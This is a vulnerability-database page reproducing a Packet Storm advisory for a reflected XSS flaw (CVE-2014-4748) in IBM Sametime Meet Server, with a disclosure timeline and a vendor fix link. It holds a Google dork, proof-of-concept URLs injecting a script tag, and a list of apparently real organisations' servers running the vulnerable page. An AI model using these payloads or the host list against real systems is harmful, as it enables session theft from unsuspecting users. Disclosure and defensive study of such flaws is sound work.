Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAdriano Marcio MonteiroPACKETSTORM:127831
HistoryAug 11, 2014 - 12:00 a.m.

IBM Sametime Meet Server 8.5 Cross Site Scripting

2014-08-1100:00:00
Adriano Marcio Monteiro
packetstormsecurity.com
18

0.003 Low

EPSS

Percentile

65.1%

JSON
`# Exploit Title: IBM Sametime Meet Server 8.5 Reflect Cross Site Script  
# Google Dork: intitle:"Meeting Center - IBM Lotus Sametime"  
# Date: 11/08/2014  
# CVSS Score: http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=AV:N/AC:M/Au:N/C:P/I:N/A:N%29  
# CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4748  
# OSVDB-ID: http://osvdb.org/109444  
#  
# Author: Adriano Marcio Monteiro  
# E-mail: [email protected]  
# Blog: http://www.brazucasecurity.com.br  
#   
# Vendor: http://www.ibm.com  
# Software: http://www.ibm.com/sametime  
# Version: 8.5.1  
# Advisory: https://www-304.ibm.com/support/docview.wss?uid=swg21679221  
#   
# Test Type: Black Box  
# Tested on: Windows 7 Enterprise SP1 x86 pt-br, Mozilla Firefox 30.0 /Internet Explorer 10 / Google Chrome VersΓ£o 33.0.1750.146 m  
  
  
  
Table of Contents  
  
[0x00] The Vulnerability  
[0x01] Exploit Description  
[0x02] PoC - Proof of Concept  
[0x03] Correction or Workaround  
[0x04] Timeline  
[0x05] Published  
[0x06] References  
[0x07] Bibliography  
  
  
  
[0x00] The Vulnerabilty  
  
Reflected Cross Site Scripting (XSS)  
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. An attacker can use XSS to send a malicious script to an unsuspecting user. The end userΒ’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page  
  
  
  
[0x01] Description  
  
IBM Sametime Classic Meeting Server is vulnerable to reflected cross-site scripting, caused by improper validation of user supplied input. A remote attacker could exploit this vulnerability using a specially crafted URL to execute a script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials.  
  
  
  
[0x02] PoC - Proof of Concept  
For exploit this vulnerability you only need to submit the crafted URL to victim.  
  
http://sametime02.myserver.com.br/stconf.nsf/WebAttendFrameset?OpenAgent&view=Attend&docID=$DOCID$&meetingID=$MEETID$&join_type=mrc&subject=</title><script>alert('I am a XSS')</script><!--&userLang=pt_BR  
  
http://sametime02.myserver.com.br/stconf.nsf/vwCalendar?OpenView&Grid="><script>alert(' I am a XSS')</script><!--&Date=2014-07-28  
  
Examples:  
  
http://sametime.eletrosul.gov.br/stconf.nsf/frmConference?OpenForm  
http://sametime.sp.gov.br/stconf.nsf/frmConference?OpenForm  
http://sametime.grude.ufmg.br/stconf.nsf/frmConference?OpenForm  
http://sametime.schahin.com.br/stconf.nsf/frmConference?OpenForm  
http://sametime.c-pack.com.br/stconf.nsf/frmConference?OpenForm  
http://www.azi.com.br/stconf.nsf/frmConference?OpenForm  
http://aquila.sealinc.org/stconf.nsf/frmConference?Openform  
http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform  
http://comware.net/stconf.nsf/frmConference?Openform  
https://236ws.dpteruel.es/stconf.nsf/frmConference?OpenForm  
https://correoweb.gruposanjose.biz/stconf.nsf/frmConference?Openform  
http://noteschat.sola.kommune.no/stconf.nsf/frmConference?Openform  
https://mail.dba.uz/stconf.nsf/frmConference?Openform  
  
  
  
[0x03] Correction or Workaround  
  
Apply the procedures described in the follow link:  
http://www-01.ibm.com/support/docview.wss?uid=swg21679454  
  
  
  
[0x04] Timeline  
  
18/07/2014 - Vulnerabilities discovered  
19/07/2014 - Vulnerabilities reporteds to IBM PSIRT Team  
23/07/2014 - Advisory and troubleshooting fix published  
  
  
  
[0x05] Published  
  
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4748  
http://www.securityfocus.com/bid/68841  
  
  
  
[0x06] References  
  
OWASP - Cross-site Scripting (XSS)  
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)  
  
CWE-264: Permissions, Privileges, and Access Controls  
http://cwe.mitre.org/data/definitions/79.html  
  
  
  
[0x07] Bibliography  
  
http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent  
  
  
[end]  
`

Related

cve 1
prion 1
nvd 1
cvelist 1
openvas 1
cve
cve
CVE-2014-4748
2014-07-26 15:55:03
prion
prion
Cross site scripting
2014-07-26 15:55:00
nvd
nvd
CVE-2014-4748
2014-07-26 15:55:03
cvelist
cvelist
CVE-2014-4748
2014-07-26 15:00:00
openvas
openvas
IBM Sametime Classic Meeting Server Multiple Vulnerabilities
2014-08-27 00:00:00

0.003 Low

EPSS

Percentile

65.1%

JSON
Related for PACKETSTORM:127831
cve1prion1nvd1cvelist1openvas1